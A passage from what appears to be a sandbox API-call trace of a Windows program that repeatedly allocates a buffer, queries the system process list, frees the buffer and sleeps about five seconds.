BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.623] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.627] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.633] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.636] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.641] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.643] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.643] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.648] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.651] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.656] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.663] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.669] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.676] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.683] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.683] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.690] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.698] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.705] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.706] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.706] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.712] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.714] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.715] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.719] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.720] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.725] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.725] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.730] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.744] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.750] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.752] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.758] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.760] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.764] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.766] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0229.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0229.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0229.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0229.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0229.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0229.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0229.772] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 